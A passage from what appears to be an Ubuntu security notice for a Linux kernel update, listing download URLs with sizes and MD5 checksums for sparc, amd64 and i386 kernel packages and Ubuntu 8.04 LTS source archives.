http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb
  Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5: 15017856 479231852577fdd0e402556287a02059
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   163276 481deef18ee50e039791747737619c3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    59308 83efde441d0de3f09bb163e53016a300
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz
  Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc
  Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb
  Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb
  Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb
  Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb
  Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    52646 2c736bab70f1efeade320f9062b74729
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   145458 3e087634d61556643c32e342214a0642
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb
  Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    21598 6d6c27b8756a70466451449e096bd149
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    23690 ceb5d148f00965516252470b41d00b56
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    26794 50bb7020338de7d00265de0765578291
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32672 7135f346092b651dafed111b91aee44d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    47602 e55422dc48484675642c96bdbc673595
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2089276 69416120cd161789b598b2b93034db07
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb
  Size/MD5:   707576 d26794effd4e857da1db4d28e9407611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163034 9cc84b270528d0fef36320974b415392
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   236710 755a3caeceece8650e46706804c6e072
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   150836 169c287e6bc754d02924a719d34aad29
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   156072 9ff98bc4b62d033785de95858201c353
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    33388 860c1b56a45914246929757c815f5ec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92446 6525df043e2a865a6eb646f015140e31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093
